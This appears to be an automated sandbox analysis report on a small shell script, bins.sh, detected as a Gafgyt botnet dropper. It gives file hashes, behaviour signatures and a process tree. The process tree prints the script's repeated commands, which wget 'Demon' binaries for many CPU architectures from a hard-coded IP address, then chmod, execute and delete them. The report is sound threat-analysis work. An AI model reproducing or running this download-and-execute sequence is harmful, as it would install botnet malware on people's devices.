Analysis
-
max time kernel
8s -
max time network
9s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240611-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240611-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
19-10-2024 11:41
Static task
static1
Behavioral task
behavioral1
Sample
bins.sh
Resource
debian12-armhf-20240418-en
Behavioral task
behavioral2
Sample
bins.sh
Resource
debian12-mipsel-20240729-en
Behavioral task
behavioral3
Sample
bins.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral4
Sample
bins.sh
Resource
debian9-mipsbe-20240418-en
Behavioral task
behavioral5
Sample
bins.sh
Resource
debian9-mipsel-20240611-en
Behavioral task
behavioral6
Sample
bins.sh
Resource
ubuntu1804-amd64-20240611-en
Behavioral task
behavioral7
Sample
bins.sh
Resource
ubuntu2004-amd64-20240611-en
Behavioral task
behavioral8
Sample
bins.sh
Resource
ubuntu2204-amd64-20240611-en
Behavioral task
behavioral9
Sample
bins.sh
Resource
ubuntu2404-amd64-20240523-en
General
-
Target
bins.sh
-
Size
2KB
-
MD5
a754f4cf9d6ba2d574cd90bf04d1bc35
-
SHA1
b0191e89c26057b6132f3314fa685e1879c7dc62
-
SHA256
bf9fa0c44e56d564d8675f89533c1930b9481597d1f0d09153757d595b8ddaa0
-
SHA512
600b970d65a1b8d80e0c7e9808cff50fbb610762a97d619293b859383c85ff671a28793f49d8207c984ffe113c63dabfa66d3df4d922b32c79ce707b3393162f
Malware Config
Signatures
-
Detected Gafgyt variant 1 IoCs
Processes:
resource yara_rule /tmp/Demon.mips family_gafgyt -
File and Directory Permissions Modification 1 TTPs 14 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Processes:
chmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodchmodpid process 1438 chmod 1443 chmod 1471 chmod 1476 chmod 1502 chmod 1448 chmod 1460 chmod 1465 chmod 1487 chmod 1497 chmod 1433 chmod 1482 chmod 1492 chmod 1507 chmod -
Executes dropped EXE 1 IoCs
Processes:
Demon.mipsioc pid process /tmp/Demon.mips 1434 Demon.mips -
Reads system routing table 1 TTPs 3 IoCs
Gets active network interfaces from /proc virtual filesystem.
Processes:
Demon.x86Demon.i686Demon.i586description ioc process File opened for reading /proc/net/route Demon.x86 File opened for reading /proc/net/route Demon.i686 File opened for reading /proc/net/route Demon.i586 -
Changes its process name 3 IoCs
Processes:
Demon.x86Demon.i686Demon.i586description pid process Changes the process name, possibly in an attempt to hide itself 1449 Demon.x86 Changes the process name, possibly in an attempt to hide itself 1466 Demon.i686 Changes the process name, possibly in an attempt to hide itself 1477 Demon.i586 -
Reads system network configuration 1 TTPs 3 IoCs
Uses contents of /proc filesystem to enumerate network settings.
Processes:
Demon.x86Demon.i686Demon.i586description ioc process File opened for reading /proc/net/route Demon.x86 File opened for reading /proc/net/route Demon.i686 File opened for reading /proc/net/route Demon.i586 -
System Network Configuration Discovery 1 TTPs 3 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
rmwgetDemon.mipspid process 1436 rm 1393 wget 1434 Demon.mips -
Writes file to tmp directory 13 IoCs
Malware often drops required files in the /tmp directory.
Processes:
wgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetwgetdescription ioc process File opened for modification /tmp/Demon.arm4 wget File opened for modification /tmp/Demon.mips wget File opened for modification /tmp/Demon.sh4 wget File opened for modification /tmp/Demon.x86 wget File opened for modification /tmp/Demon.arm6 wget File opened for modification /tmp/Demon.i686 wget File opened for modification /tmp/Demon.ppc wget File opened for modification /tmp/Demon.i586 wget File opened for modification /tmp/Demon.mpsl wget File opened for modification /tmp/Demon.m68k wget File opened for modification /tmp/Demon.sparc wget File opened for modification /tmp/Demon.arm5 wget File opened for modification /tmp/Demon.arm7 wget
Processes
-
/tmp/bins.sh/tmp/bins.sh1⤵PID:1392
-
/usr/bin/wgetwget http://38.123.149.216/Demon.mips2⤵
- System Network Configuration Discovery
- Writes file to tmp directory
PID:1393 -
/usr/bin/chmodchmod +x Demon.mips2⤵
- File and Directory Permissions Modification
PID:1433 -
/tmp/Demon.mips./Demon.mips2⤵
- Executes dropped EXE
- System Network Configuration Discovery
PID:1434 -
/usr/bin/rmrm -rf Demon.mips2⤵
- System Network Configuration Discovery
PID:1436 -
/usr/bin/wgetwget http://38.123.149.216/Demon.mpsl2⤵
- Writes file to tmp directory
PID:1437 -
/usr/bin/chmodchmod +x Demon.mpsl2⤵
- File and Directory Permissions Modification
PID:1438 -
/tmp/Demon.mpsl./Demon.mpsl2⤵PID:1439
-
/usr/bin/rmrm -rf Demon.mpsl2⤵PID:1441
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sh42⤵
- Writes file to tmp directory
PID:1442 -
/usr/bin/chmodchmod +x Demon.sh42⤵
- File and Directory Permissions Modification
PID:1443 -
/tmp/Demon.sh4./Demon.sh42⤵PID:1444
-
/usr/bin/rmrm -rf Demon.sh42⤵PID:1446
-
/usr/bin/wgetwget http://38.123.149.216/Demon.x862⤵
- Writes file to tmp directory
PID:1447 -
/usr/bin/chmodchmod +x Demon.x862⤵
- File and Directory Permissions Modification
PID:1448 -
/tmp/Demon.x86./Demon.x862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1449 -
/usr/bin/rmrm -rf Demon.x862⤵PID:1452
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm62⤵
- Writes file to tmp directory
PID:1453 -
/usr/bin/chmodchmod +x Demon.arm62⤵
- File and Directory Permissions Modification
PID:1460 -
/tmp/Demon.arm6./Demon.arm62⤵PID:1461
-
/usr/bin/rmrm -rf Demon.arm62⤵PID:1463
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i6862⤵
- Writes file to tmp directory
PID:1464 -
/usr/bin/chmodchmod +x Demon.i6862⤵
- File and Directory Permissions Modification
PID:1465 -
/tmp/Demon.i686./Demon.i6862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1466 -
/usr/bin/rmrm -rf Demon.i6862⤵PID:1469
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc2⤵
- Writes file to tmp directory
PID:1470 -
/usr/bin/chmodchmod +x Demon.ppc2⤵
- File and Directory Permissions Modification
PID:1471 -
/tmp/Demon.ppc./Demon.ppc2⤵PID:1472
-
/usr/bin/rmrm -rf Demon.ppc2⤵PID:1474
-
/usr/bin/wgetwget http://38.123.149.216/Demon.i5862⤵
- Writes file to tmp directory
PID:1475 -
/usr/bin/chmodchmod +x Demon.i5862⤵
- File and Directory Permissions Modification
PID:1476 -
/tmp/Demon.i586./Demon.i5862⤵
- Reads system routing table
- Changes its process name
- Reads system network configuration
PID:1477 -
/usr/bin/rmrm -rf Demon.i5862⤵PID:1480
-
/usr/bin/wgetwget http://38.123.149.216/Demon.m68k2⤵
- Writes file to tmp directory
PID:1481 -
/usr/bin/chmodchmod +x Demon.m68k2⤵
- File and Directory Permissions Modification
PID:1482 -
/tmp/Demon.m68k./Demon.m68k2⤵PID:1483
-
/usr/bin/rmrm -rf Demon.m68k2⤵PID:1485
-
/usr/bin/wgetwget http://38.123.149.216/Demon.sparc2⤵
- Writes file to tmp directory
PID:1486 -
/usr/bin/chmodchmod +x Demon.sparc2⤵
- File and Directory Permissions Modification
PID:1487 -
/tmp/Demon.sparc./Demon.sparc2⤵PID:1488
-
/usr/bin/rmrm -rf Demon.sparc2⤵PID:1490
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm42⤵
- Writes file to tmp directory
PID:1491 -
/usr/bin/chmodchmod +x Demon.arm42⤵
- File and Directory Permissions Modification
PID:1492 -
/tmp/Demon.arm4./Demon.arm42⤵PID:1493
-
/usr/bin/rmrm -rf Demon.arm42⤵PID:1495
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm52⤵
- Writes file to tmp directory
PID:1496 -
/usr/bin/chmodchmod +x Demon.arm52⤵
- File and Directory Permissions Modification
PID:1497 -
/tmp/Demon.arm5./Demon.arm52⤵PID:1498
-
/usr/bin/rmrm -rf Demon.arm52⤵PID:1500
-
/usr/bin/wgetwget http://38.123.149.216/Demon.arm72⤵
- Writes file to tmp directory
PID:1501 -
/usr/bin/chmodchmod +x Demon.arm72⤵
- File and Directory Permissions Modification
PID:1502 -
/tmp/Demon.arm7./Demon.arm72⤵PID:1503
-
/usr/bin/rmrm -rf Demon.arm72⤵PID:1505
-
/usr/bin/wgetwget http://38.123.149.216/Demon.ppc440fp2⤵PID:1506
-
/usr/bin/chmodchmod +x Demon.ppc440fp2⤵
- File and Directory Permissions Modification
PID:1507 -
/tmp/Demon.ppc440fp./Demon.ppc440fp2⤵PID:1508
-
/usr/bin/rmrm -rf Demon.ppc440fp2⤵PID:1509
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
211KB
MD5455a2acf75de8da6ab7c4d9564cc69f9
SHA19e6016c6581289e685bcd6392bbf0bcf6b1182ff
SHA256b08dea7aae12f248b7730af3c8f924dd67d3251d78df15a9dfb75e5d961df152
SHA512a76b00d7f684d762ea9d5fa60d579d70b8bdfe75faedb59baae6ffb676d25d57826cde4a639c0b32dfcc3288a965591e148a489e6259910e3e0dbee90ccadeab